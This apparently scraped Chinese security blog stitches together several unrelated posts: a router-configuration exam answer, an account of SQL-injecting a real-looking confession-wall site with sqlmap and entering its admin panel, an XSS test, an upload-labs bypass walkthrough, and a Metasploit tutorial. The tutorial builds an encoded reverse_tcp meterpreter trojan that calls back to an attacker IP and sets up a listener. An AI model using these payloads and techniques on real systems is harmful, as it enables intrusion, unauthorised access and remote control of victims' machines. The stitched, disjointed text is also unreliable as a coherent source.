[R4‐ospf‐1]default‐route‐advertise cost 5000 [R5]ip route‐static 0.0.0.0 0 200.2.2.2 [R5‐ospf‐1]default‐route‐advertise在R4，R5上分别配置 EASY IP，保障所有业务网段可以通过R4或者R5访问到互联网。[R4]acl basic 2000 [R4‐acl‐ipv4‐basic‐2000]rule permit source 192.168.1.0 0.0.0.255 [R4‐acl‐ipv4‐basic‐2000]rule permit source 192.168.2.0 0.0.0.255 [R4]interface Serial 1/0 [R4‐Serial1/0]nat outbound 2000[R5]acl basic 2000 [R5‐acl‐ipv4‐basic‐2000]rule permit source 192.168.1.0 0.0.0.255 [R5‐acl‐ipv4‐basic‐2000]rule permit source 192.168.2.0 0.0.0.255 [R5]interface Serial 1/0 [R5‐Serial1/0]nat outbound 2000R4，R5分别通过单线串行链路连接到互联网，需要配置 PPP，并配置双向 chap 验证。[R6]local‐user r4 class network New local user added. [R6‐luser‐network‐r4]password simple 123 [R6‐luser‐network‐r4]service‐type ppp [R6]local‐user r5 class network New local user added. [R6‐luser‐network‐r5]password simple 123 [R6‐luser‐network‐r5]service‐type ppp //开启ppp验证 [R6]interface Serial 1/0 [R6‐Serial1/0]ppp authentication‐mode chap [R6‐Serial1/0]ppp chap user r6 [R6‐Serial1/0]qu [R6]interface Serial 2/0 [R6‐Serial2/0]pp authentication‐mode chap [R6‐Serial2/0]ppp chap user r6//配置R4 [R4]local‐user r6 class network New local user added. [R4‐luser‐network‐r6]password simple 123 [R4‐luser‐network‐r6]service‐type ppp [R4‐luser‐network‐r6]qu [R4]interface Serial 1/0 [R4‐Serial1/0]ppp authentication‐mode chap [R4‐Serial1/0]ppp chap user r4//配置R5 [R5]local‐user r6 class network New local user added. [R5‐luser‐network‐r6]password simple 123 [R5‐luser‐network‐r6]service‐type ppp [R5‐luser‐network‐r6]qu [R5]interface Serial 1/0 [R5‐Serial1/0]ppp authentication‐mode chap [R5‐Serial1/0]ppp chap user r5R5开启 TELNET 远程管理，使用用户 mo66.cn 登录，密码666 ，权限为最高；并且只允许技术部远程管理 R5。[R5]local‐user mo66.cn class manage New local user added. [R5‐luser‐manage‐huaxia]password simple 666 [R5‐luser‐manage‐huaxia]service‐type telnet [R5‐luser‐manage‐huaxia]qu [R5]telnet server enable [R5]user‐interface vty 0 4 [R5‐line‐vty0‐4]authentication‐mode scheme [R5‐line‐vty0‐4]user‐role level‐15 //配置acl只允许技术部管理R5 [R5]acl basic 2001 [R5‐acl‐ipv4‐basic‐2001]rule permit source 192.168.1.0 0.0.0.255 [R5‐acl‐ipv4‐basic‐2001]qu [R5]telnet server acl 200交卷交卷~

记一次渗透表白墙 前几天不是520什么什么的节日吗，然后我就在群里看到有人发了个表白站，我进去看了几眼，然后就随手一个Ctrl+d，到了今天才看到，就点进去看了一下，然后就有这篇文章了前台就是这样看了一下有人在表白，连真人图片都有，虽然别人都不怕被看见，还是打下码，就在这个页面https://xxx.cn/cont.php?id=64顺手一个单引号，页面就出问题了于是就拿出我们的sqlmap神器，把它丢进去，结果存在注入开始跑库名sqlmap -u "https://xxx.cn/cont.php?id=64" --dbs得到了数据库名后又继续，跑出了数据表，看到admin表最终得到了数据表中的内容，进行解密后，有些吃惊密码居然是admin，刚刚就应该先在后台登陆页面爆破一顿。现在访问/admin后台登陆页面成功登陆了后台由于自己太菜了就没有继续渗透下去了

记一次因为运气好挖到xss 一切都要无聊的早上说起，10.30上完网课，好久没有看看博客了。点了友情链接看看，故事就开始了看到评论区表情直接是img标签，尝试了<script>alert(1)</script>被无情的拦截，这样太尴尬了只能另找思路，正当我在想换思路时，看到有一个进去一看，可以发弹幕，尝试了<script>alert(1)</script>,成功弹了作为三好青年，我第一时间，联系了大佬，大佬很快修复了。

upload-labs通关 简介upload-labs是一个使用php语言编写的，专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关，每一关都包含着不同上传方式。项目地址: https://github.com/c0ny1/upload-labs运行环境操作系统 Window or Linux 推荐使用Windows，除了Pass-19必须在linux下，其余Pass都可以在Windows上运行PHP版本 推荐5.2.17 其他版本可能会导致部分Pass无法突破PHP组件 php_gd2,php_exif 部分Pass依赖这两个组件中间件 设置Apache以moudel方式连接第1关开启抓包，发现js限制通过禁用js轻松绕过第2关mime检查修改Content-Type: image/png第3关查看提示是黑名单限制，但是没有限制phtml将文件名改成phtml即可绕过访问看看，成功解析第4关查看提示，黑名单限制，已经限制了phtml发现没有限制.htaccess，因此上传一个内容：SetHandler application/x-httpd-php然后，再将改成png上传成功，访问试试看第5关已经禁止了.htaccess，因此显然不行使用后缀大小写混合即可绕过第6关尝试了一下上一关的方法，上传失败查看源代码，发现可以在后缀加空格绕过第7关后缀加点进行绕过第8关对后缀加入::$DATA进行绕过第9关在后缀加入. .即可绕过第10关双写绕过构造pphphp进行绕过第11关抓包发现可以修改路径，使用%00截断进行绕过第12关跟上一关对比，需要将%00进行url编码即可绕过学习中……

msfconsole(msf)渗透Windows 简介Metasploit是一款开源安全漏洞检测工具，附带数百个已知的软件漏洞，并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。生成首先我们打开kali，打开一个终端输入下面的命令并按下回车进行生成：msfvenom -p windows/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=5555 -f exe > ./test.exeLHOST=192.168.1.106 此步是设置攻击者IP地址LPORT=5555 此步是设置木马将会主动连接攻击者设定的监听端口test.exe 木马名称生成完成后打开你存放的目录，我这里是root的根目录然后将这个文件发送到目标主机（先别急着运行）设置监听现在我们回到kali中，在终端中启动msf（启动命令：msfconsole）启动完成后下面开始设置监听依次输入下面命令 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 5555 exploitset LHOST 192.168.1.106 后面的ip地址是kali的ip获取kal ip的方法：在终端输入ifconfigset LPORT 5555 监听端口下面就是监听状态一切准备就绪现在可以去运行目标主机的那个msf文件好了此教程就到这里了